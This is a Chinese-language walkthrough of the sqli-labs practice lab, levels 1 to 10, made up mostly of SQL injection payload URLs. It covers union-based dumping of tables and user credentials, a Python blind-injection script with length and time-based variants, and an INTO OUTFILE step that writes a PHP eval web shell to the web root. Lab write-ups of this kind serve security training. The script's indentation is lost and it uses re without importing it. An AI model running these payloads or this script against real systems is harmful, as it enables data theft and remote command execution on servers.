文章目录
Less-1 字符报错注入
简单报错注入,分号检测
payload:
http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+
检测字段数,字段为3
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+
查看用户:sqli@localhost
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
查看数据库:security
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
查看表名:users,emails,uagents,referers
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(column_name),3 from information_schema.columns where table_name='users' --+
查看列名:id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(id),group_concat(username) from users--+
查看表信息
Less-2 数字报错注入
测试注入:
http://192.168.44.139/sqli-labs/Less-2/?id=1 and 1=2
剩下的和语句和less1一样,去掉数字后面的分号即可
Less-3
根据报错信息,引号后面还有一个括号,注入则改成2')
,其余一样。
Less-4
2")
注入 双引号
Less-5 字符盲注
判断数据库长度:
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or (length(database()))>3 --+
判断数据库名:(字母逐个判断)
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or ascii(substr(database(),1,1))>1 --+
................................
自动化注入,贴一个小脚本:
import requests
url = "http://192.168.44.139/sqli-labs/Less-5/?id=-1"
_columns = []
_tables = []
_database = ""
def binarySearch(payload):
maxn = 144
minn = 1
while minn<=maxn:
middle = (maxn+minn)//2
payload1 = payload+">"+str(middle)+"--+"
#print(payload1)
r = requests.get(payload1)
if "You are in" in r.text:
minn = middle+1
else:
maxn = middle-1
return minn
def getLength(func):
payload1 = url+"' or length({})".format(func)
return binarySearch(payload1)
def getStr(func, length):
mstr = ""
for i in range(1,length+1):
payload = url+"' or ascii(substr({},{},1))".format(func,i)
tmp = binarySearch(payload)
mstr += chr(tmp)
#print(mstr)
return mstr
def getDatabase():
global _database
func = "database()"
result = getStr(func, getLength(func))
print("[*] database: "+result)
_database = result
def getTaleNUM(database):
func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
length = getLength(func)
print(length)
result = getStr(func, length)
print("[*] table num ="+result)
def getTales(database):
global _tables
func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
length = getLength(func)
result = getStr(func, length)
_tables = result.split(',')
print("[*] tables: "+result)
def getColumns(table, database):
global _columns
func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
length = getLength(func)
#print(length)
result = getStr(func, length)
_columns = result.split(",")
print("[*] columns from {}:".format(table)+result)
def getInformation(table, column):
Info = {}
for i in column:
func = "(select group_concat({}) from {})".format(i, table)
length = getLength(func)
#print(length)
result = getStr(func, length)
Info[i] = result.split(',')
#print(result)
#print(Info[i])
for i in range(len(Info[column[0]])):
mstr = ""
for j in column:
mstr += Info[j][i]
mstr += " "
print(mstr)
if __name__ == "__main__":
getDatabase()
getTales(_database)
getColumns(_tables[0],_database)
getInformation(_tables[0], _columns)
Less-6
将第五关的单引号改为双引号
Less-7 文件写入注入
写入shell,注意权限
http://192.168.44.139/sqli-labs/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile '/var/www/html/a.txt' --+
写入之前可以先使用@@datadir查看服务器系统类型,尝试猜web得绝对路径
Less-8
盲注。可用第五关脚本
Less-9 时间盲注
盲注,虽然题目为时间盲注,但是可以根据返回数据长度来进行bool盲注,更改第五关脚本的binarySearch函数即可
#LEN为正常返回时的长度,当id不存在时,长度会变化
LEN = len(requests.get("http://192.168.44.214/sqli-labs/Less-9/?id=1").text)
def binarySearch(payload):
maxn = 144
minn = 1
while minn<=maxn:
middle = (maxn+minn)//2
payload1 = payload+">"+str(middle)+"--+"
#print(payload1)
r = requests.get(payload1)
#print(len(r.text))
if len(r.text) == LEN:
minn = middle+1
else:
maxn = middle-1
return minn
时间盲注,修改函数:
def timeout(url):
try:
r = requests.get(url, timeout=2)
return 0
except:
return 1
def binarySearch(payload):
maxn = 144
minn = 1
while minn<=maxn:
middle = (maxn+minn)//2
payload1 = payload+">"+str(middle)+"--+"
tmp = re.split(" or |--", payload1)
#睡眠时间可根据需要调整
payload2 = tmp[0]+"or"+" if("+tmp[1]+",sleep(0.5),1)"+" --+"
# print(payload2)
if timeout(payload2):
minn = middle+1
else:
maxn = middle-1
return minn
Less-10
和Less-9注入方式一样,将分界符'
更改为"
即可